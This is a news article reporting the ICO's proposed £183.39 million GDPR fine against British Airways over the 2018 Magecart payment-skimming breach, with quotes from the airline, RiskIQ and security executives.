On Monday, the Information Commissioner’s Office announced that it has issued a fine of £183.39 million to British Airways under GDPR for failing to prevent a cyber incident last year that compromised personal and financial information of approximately 500,000 customers.
The staggering fine issued by the Information Commissioner’s Office dwarfs the 50 million euros (£44 million) fine issued by the French data protection commission to Google for failing to adhere to GDPR requirements while obtaining consent from users to process their personal data for delivering personalised advertisements.
British Airways hack affected half a million customers
In September last year, British Airways announced that it had suffered a cyber incident that compromised personal and financial information of customers who made bookings and changes on its official website between August 21 and September 5.
Initial reports suggested that the cyber incident compromised personal and financial information of around 380,000 customers whose login details, names, addresses, booking details, and payment card information were stolen by hackers from British Airways’ website. However, the airline confirmed that no passport or travel details were stolen.
“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details.
“We are deeply sorry for the disruption that this criminal activity has caused. We take the protection of our customers’ data very seriously. The breach has been resolved and our website is working normally. We have notified the police and relevant authorities,” it said.
In October, security firm RiskIQ revealed that the cyber incident involving British Airways was the work of a hacker group known as Magecart that specialised in covertly exported personal and financial data of visitors to a website to a remote server.
According to RiskIQ, hackers from Magecart used only 22 lines of script to modify a large number of scripts on the British Airways’ website and then exploited the modifications to extract information from payment forms and transfer such information to their own server. The hackers also used an unique infrastructure to carry out the attack and purposely targeted scripts that would blend in with normal payment processing to avoid detection.
“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately. This particular skimmer is very much attuned to how British Airway’s payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer,” the firm added.
To avoid detection, hackers from Magecart not only used a domain server located in Romania and one that was part of a VPN provider named Time4VPS based in Lithuania, they also used a paid SSL certificate issued by Comodo rather than a free certificate to appear genuine.
ICO issues an unprecedented fine to BA
Following the announcement from British Airways, the Information Commissioner’s Office initiated a detailed investigation into the cyber incident that culminated with the watchdog issuing an unprecedented £183.39 million fine to the former. However, the quantum of fine could change after the airline company makes a representation to the ICO as to the proposed findings and sanction.
“People’s personal data is just that – personal. When an organisation fails to protect it from loss, damage or theft it is more than an inconvenience. That’s why the law is clear – when you are entrusted with personal data you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights,” said Information Commissioner Elizabeth Denham.
“A fine of this magnitude can go a long way towards convincing companies to do everything they can to protect their customer’s private information. Too many companies continue to make the mistake of not investing enough in their cybersecurity programmes,” says Saryu Nayyar, CEO of Gurucul.
“They also continue to make the mistake of relying on the same conventional cybersecurity technologies that are continuously exploited during cyberattacks. These companies would be wise to look at new, automated approaches such as continuous monitoring of user and entity behaviours to discover anomalies as they occur,” she adds.
“The fine of £183 million by the ICO on British Airways under GDPR for the breach experienced by BA may represent a large fine, but with it comes a cautionary tale. Under GDPR, fines for breaches can reach 4% of the global revenue of an organisation. In the case of this fine, the ICO imposed a fine of 1.5% of 2017 revenue. In doing so the ICO joins CNIL with its fine on Google of 50 million Euro in stating that data privacy is serious business requiring serious attention,” says Tim Mackey, Principal Security Strategist at Synopsys CyRC.
“This then requires organisations to review precisely what their security procedures are – from development through deployment – and ensure that they can quantify the risks of any decisions to defer security improvements. These efforts range from secure development practices, up to date threat models, identification of dependency risks all the way through to penetration tests and comprehensive security audits,” he adds.